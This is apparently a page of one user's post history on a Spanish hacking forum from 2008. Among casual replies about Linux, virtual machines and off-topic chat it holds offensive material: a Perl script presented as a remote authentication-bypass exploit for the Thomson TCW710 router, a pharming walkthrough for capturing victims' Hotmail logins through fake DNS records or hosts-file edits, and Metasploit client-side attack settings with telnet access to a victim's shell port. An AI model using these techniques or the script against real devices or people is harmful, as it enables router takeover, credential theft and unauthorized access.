elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Ingresar Registrarse
11 Octubre 2008, 21:42  



  Mostrar Mensajes
Páginas: 1 2 3 4 5 6 [7] 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 ... 25
91  Seguridad Informática / Bugs y Exploits / Re: BugS en TCW710? en: 25 Agosto 2008, 10:43

@Stacker

Ha vaya lei mal XDD, intenta comentar esa linea y ejecuta el exploit platicanos que pasa en el router y con el propio exploit, seguramente tendremos que hacer algunas modificaciones para mejorarlo.

Si no tienes perl para probar, bajatelo para win32 link:
:http://downloads.activestate.com/ActivePerl/Windows/5.10/ActivePerl-5.10.0.1003-MSWin32-x86-285500.msi

Linux, esta por default.

Ejecutar win32 o Linux:

Código:
perl -x exploit_TCW710.pl


Ya nos platicaras.

-berz3k.



92  Forums Generales / Foro Libre / Re: ¡Música usando SÓLO los sonidos de Windows XP y 98! MUy muy bueno en: 25 Agosto 2008, 08:43
Tambien es posible hacerlo con impresoras, scanners y modems, algunos frekis tienen bastante tiempo para crear las melodias.

-berz3k.

93  Seguridad Informática / Hacking Avanzado / Re: despues de averiguar contraseña routuer en: 25 Agosto 2008, 08:35

El "pharming" como ya es conocido, puede ser una opcion para que la victima se conecte a una pagina "fake" y que basicamente es modifcar el archivo "host" de la propia victtima e.g:

La ruta exacta en Win32 XP seria:

Código:
C:\WINDOWS\system32\drivers\etc\hosts

Notepad o Wordpad

Código:
# Copyright (c) 1993-1999 Microsoft Corp.
# etc
# etc
# etc
127.0.0.1       localhost
192.0.0.10    www.google.com  # <-IP con pagina falsa de Google.

Por lo que veo el "pharming" se haria de otra forma:

Ya que somos el "Server DNS", la victima podra navegar y resolver dominios hacia internet, pero tambien los "records" que agreguemos en nuestro propio "Server DNS".

Bien ahora el poner en escucha una pagina, no creo que implique modificar nuestros propio archivo HOST, si agregamos un "record" sera mas que suficiente para que la victima entre e.g

Nuevo Record
192.0.0.10 www.hotmail.com

Cuando la victima trate de entrar ah hotmail.com vera nustra "fake" page, tratara de loguearse y obtendremos su login y pass, esto tambien implicaria algo de programacion Java, PHP o HTML para que sea lo mas real posible.

Conozco diferentes caminos para explotar "side client" , pero hablando de metasploit seguramente te funcionara los Real Player, Winamp, Firefox etc, te pedira la siguientes opciones clasicas para atacar "side client" agregare un ejemplo:

Código:
SRVHOST=192.0.0.20 <-IP atacante es decir tu
SRVPORT=8080 <- Puerto en escucha, estara por default el 8080.
LPORT=4444 <- Puerto que escuchara la victima.


Una vez que la victma se haya conectado a la IP 192.0.0.20, y tenga instalado cualquiera de los exploits comunes de Metasploit .eg. IE, Winamp, Real Player etc, automaticamente sera explotado (si no tiene parches o firewall mal configurado), tendras acceso a su unidad o PC remotamente, es decir c:\ , simplemente:

Código:
telnet ip.victima 4444

-berz3k.








 




94  Seguridad Informática / Bugs y Exploits / Re: BugS en TCW710? en: 24 Agosto 2008, 23:07
@Stacker

La linea de "Authorization:" esta conteplada en el codigo anteriormente posteado, dentro de la variable $headers.

Código:
'Authorization:' => 'Basic OmFkbWlu', # base64 encode
95  Seguridad Informática / Bugs y Exploits / Re: BugS en TCW710? en: 22 Agosto 2008, 01:26
Vaya, no tengo la oportunidad de probarlo en mi LAB, espero me presten alguno para hacer algunas pruebas, si todo marcha como dices, me adelanto a crear un pequeño exploit remoto, version beta, habra que comprobar algunas otra cosas y sacarle el mayor provecho:

Código:
#!/usr/bin/perl -w
#
# Router WiFi Thomson TCW710
# Remote Exploit bypass Authentication via "POST"
#
# By berz3k [berz3k at gmail.com]


use strict;
use LWP;
use Data::Dumper;
require HTTP::Request;
require HTTP::Headers;

my $method = 'POST'; # Method "GET" or "POST"
my $uri = '192.168.0.1'; # Factory default IP address
my $content = "/goform/RgForwarding?"; # Variable to send


my $headers = HTTP::Headers->new(

 'Host:'                => '192.168.0.1',
 'User-Agent:'          => 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6 Paros/3.2.13',
 'Accept:'              => 'text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5',
 'Accept-Language:'     => 'en-us,en;q=0.5',
 'Accept-Charset:'    => 'ISO-8859-1,utf-8;q=0.7,*;q=0.7',     
 'Keep-Alive:'          => '300',
 'Connection:'          => 'keep-alive',
 'Referer:'        => 'http://192.168.0.1',
 'Authorization:' => 'Basic OmFkbWlu', # base64 encode
 'Content-Length:' => '1159',

);

my $request = HTTP::Request->new($method, $uri, $headers, $content);

my $ua = LWP::UserAgent->new;
my $response = $ua->request($request);

print "[+] Remote Exploit for TCW710 Beta\n";
print "[+] Coded by: berz3k [berz3k\@gmail.com]\n";
print "[+] We got this response from router: \n\n" . $response->content . "\n";

my $data;
foreach my $pair (split('&', $response->content)) {
  my ($k, $v) = split('=', $pair);
  $data->{$k} = $v;
}

if ($data->{RESULT} != 0) {

print "[+] Remote Exploit for TCW710 Beta\n";
print "[+] Coded by: berz3k [berz3k\@gmail.com]\n";
print "[+] Use:\n";
print "\tperl -x exploit_TCW710.pl\n";
  print $data->{RESPMSG} . "\n";
exit(0);

} else {

  print "[+] Remote Exploit for TCW710 Beta\n";
print "[+] By berz3k [berz3k\@gmail.com]\n";

}


96  Seguridad Informática / Hacking Básico / Re: *** Hackear con CryptCat y Backdorizar *** By Vengador de las Sombras en: 21 Agosto 2008, 10:23
Yo le cambiaria el nombre del "topic" no veo que momento "hackeas" :-)

Muy similar el proceso de netcat, (regedit, puerto en escucha, etc) , excepto que el trafico ira cifrado por cryptcat.

"Backdoreando con cryptcat y wget sobre win32" <--podria ser? hehe

-berz3k.

97  Seguridad Informática / Bugs y Exploits / Re: Bugs sin exploits!! en: 21 Agosto 2008, 10:09
No recuerdo si fui yo, te posteo tantas cosas y al final solo me dices "que? " XDD (broma), buscare de nuevo...

-berz3k.

98  Sistemas Operativos / GNU/Linux / Re: ser Root? o usuario comun? en: 21 Agosto 2008, 10:02
Yo no tengo pacienciencia de esta tecleando pass de root cada vez que utlizo programas , debuggin etc, claro; si eres de los que sigue las "Best Practices User Linux", siempre recomendaran que crees un usuario mortal.

sencillo:

Usuario Normal (crear usuario sin prvilegios)
Usuario Intermedio  (usuario con privilegios y/o uso de root)
Usuario Avanzado (uso de root en todas las expresiones)

-berz3k.

PD: Yo uso root en todos los casos, tanto en Windows XP, Vista y win2k, como en Linux y OSX, solo cuando navego me convierto en user mortal bajos privilegios y protecciones TODAS.



99  Comunicaciones / Redes / Re: Crear un server casero en: 21 Agosto 2008, 09:54
Lo primero que me se ocurre para esas caracteristicas que nos posteas, es instalarle un pequeño Linux sencillo como debian, agregarlo como proxy para que puedan conectarse las demas PCs.

-berz3k.

:http://debian.org

100  Sistemas Operativos / Mac OS X, BSD / Re: Triple booteo: Mac OS - Windows - Ubuntu Todo desde Mac OS en: 21 Agosto 2008, 09:49
Yo tengo todo en vmware, hace poco que me pase a VISTA que la verdad esta feo, pero ya lo hago todo VM, kubuntu, Debian, Windows Vista, Win2k y MaC OS x86. es casi lo mismo y es mas comodo para trabajar. (mi opinion), puedes buscar ya los ISO preinstalled en .torrents.

-berz3k.
101  Forums Generales / Foro Libre / Re: Como recurrir a la informatica para superar depresion por la chica? en: 21 Agosto 2008, 09:43
La informatica, internet, programacion & hack suff, sera tu mejor consuelo, intentalo y veras, te olvidaras del mundo exterior y de las mujeres, todo esta online y al alcance de tu teclado.

-berz3k.

102  Forums Generales / Noticias / Re: Hackers invaden la web del Comité Olímpico de Brasil en: 21 Agosto 2008, 09:40
Si existe las olimpiadas de informatica, no tengo el link a la mano.

-berz3k.
103  Forums Generales / Foro Libre / Re: El brujo 06 Años Registrado =O en: 21 Agosto 2008, 09:39
6 años que loco, congratulations!

-berz3k.
104  Forums Generales / Foro Libre / Re: Video censurado por la nasa demuestra que si hay extraterrestes. en: 20 Agosto 2008, 12:20
Ha ya lo vi sorry XDD

-berz3k.
105  Forums Generales / Foro Libre / Re: Video censurado por la nasa demuestra que si hay extraterrestes. en: 20 Agosto 2008, 12:18
No veo el link del video, posteen

-berz3k.
Páginas: 1 2 3 4 5 6 [7] 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 ... 25






Consolas     La Web de Goku     MilW0rm     MundoDivx

Hispabyte     Truzone     TodoReviews     ZonaPhotoshop

hard-h2o modding    Foros de ayuda    Yashira.org    Videojuegos    indetectables.net   

Noticias Informatica    Seguridad Informática    ADSL    Foros en español    eNYe Sec

Todas las webs afiliadas están libres de publicidad engañosa.

Powered by SMF 1.1.6 | SMF © 2006-2008, Simple Machines LLC
Free counter and web stats